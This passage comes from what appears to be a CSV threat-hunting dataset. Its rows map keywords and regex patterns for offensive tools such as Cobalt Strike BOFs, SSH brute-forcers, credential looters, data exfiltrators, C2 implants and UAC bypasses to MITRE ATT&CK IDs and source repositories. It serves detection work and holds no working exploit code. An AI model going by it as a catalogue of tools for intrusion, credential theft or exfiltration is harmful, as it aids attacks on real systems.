T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_delete/*",".{0,1000}src\/Remote\/sc_delete\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*src/Remote/sc_start/*",".{0,1000}src\/Remote\/sc_start\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/ShellGhost.c*",".{0,1000}src\/ShellGhost\.c.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*Src/Spray-AD*",".{0,1000}Src\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*src/tests/NESSIE/*",".{0,1000}src\/tests\/NESSIE\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/zerologon.c*",".{0,1000}src\/zerologon\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*src\CMLootOut\*",".{0,1000}src\\CMLootOut\\.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*src\pamspy.c*",".{0,1000}src\\pamspy\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","256","57","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*srde dns -*",".{0,1000}srde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde https 
-*",".{0,1000}srde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde_release dns -k *",".{0,1000}srde_release\sdns\s\-k\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde_release https -i *",".{0,1000}srde_release\shttps\s\-i\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srv.(MerlinServer).Exe*",".{0,1000}srv\.\(MerlinServer\)\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*srvsvc_##*",".{0,1000}srvsvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*ss -tunlp || netstat -tunlp*127.0.0.1*",".{0,1000}ss\s\-tunlp\s\|\|\snetstat\s\-tunlp.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*ssf.exe -D * -p * 127.0.0.1*",".{0,1000}ssf\.exe\s\-D\s.{0,1000}\s\-p\s.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1550","234","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssfd.exe -p 
*",".{0,1000}ssfd\.exe\s\-p\s.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1550","234","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssh -N -R 4567:localhost:*root*",".{0,1000}ssh\s\-N\s\-R\s4567\:localhost\:.{0,1000}root.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*ssh -o ProxyCommand=""wstunnel*",".{0,1000}ssh\s\-o\sProxyCommand\=\""wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*ssh_key_privesc(payload*",".{0,1000}ssh_key_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*ssh_write_privesc(payload*",".{0,1000}ssh_write_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*SSH-2.0-OpenSSH_6.7p2*",".{0,1000}SSH\-2\.0\-OpenSSH_6\.7p2.{0,1000}","offensive_tool_keyword","OpenSSH Trojan","openssh 
trojan - non existing banner in official OpenSSH - only observed in compromised routers (APT28)","T1071 - T1059 - T1021 - T1065 - T1090 - T1563 - T1132 - T1078","TA0002 - TA0005 - TA0011","Moobot OpenSSH Trojan","APT28","Malware","https://www.ic3.gov/Media/News/2024/240227.pdf","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh2john *",".{0,1000}ssh2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ssh2john.py*",".{0,1000}ssh2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ssh-auditor*",".{0,1000}ssh\-auditor.{0,1000}","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","590","84","2023-12-18T21:46:18Z","2016-11-08T22:47:38Z" "*sshbrute.py*",".{0,1000}sshbrute\.py.{0,1000}","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*SSHBruteForce.py*",".{0,1000}SSHBruteForce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration 
tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*sshimpanzee --*",".{0,1000}sshimpanzee\s\-\-.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee:127.0.0.1:*",".{0,1000}sshimpanzee\:127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee-1.1-exp*",".{0,1000}sshimpanzee\-1\.1\-exp.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee-main*",".{0,1000}sshimpanzee\-main.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - 
T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshkey_persistence.*",".{0,1000}sshkey_persistence\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ssh-keygen not found in PATH, cannot escalate using SSH key*",".{0,1000}ssh\-keygen\snot\sfound\sin\sPATH,\scannot\sescalate\susing\sSSH\skey.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sshLooterC*",".{0,1000}sshLooterC.{0,1000}","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. 
which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","256","82","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" "*ssh-mitm*",".{0,1000}ssh\-mitm.{0,1000}","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1584","198","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" "*sshmon*hunt*",".{0,1000}sshmon.{0,1000}hunt.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*sshmon*kill*",".{0,1000}sshmon.{0,1000}kill.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*ssh-putty-brute -*",".{0,1000}ssh\-putty\-brute\s\-.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*ssh-putty-brute.ps1*",".{0,1000}ssh\-putty\-brute\.ps1.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 
- T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*SSH-PuTTY-login-bruteforcer*",".{0,1000}SSH\-PuTTY\-login\-bruteforcer.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*ssh-shellhost.exe*",".{0,1000}ssh\-shellhost\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*SSHSnake.log*",".{0,1000}SSHSnake\.log.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*SSH-Snake-main*",".{0,1000}SSH\-Snake\-main.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*sshuttle -r 
*0.0.0.0/24*",".{0,1000}sshuttle\s\-r\s.{0,1000}0\.0\.0\.0\/24.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sslstrip*",".{0,1000}sslstrip.{0,1000}","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1873","421","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" "*SspiUacBypass.cpp*",".{0,1000}SspiUacBypass\.cpp.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SspiUacBypass.exe*",".{0,1000}SspiUacBypass\.exe.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SspiUacBypass-main*",".{0,1000}SspiUacBypass\-main.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SSploitEnumeration*",".{0,1000}SSploitEnumeration.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in 
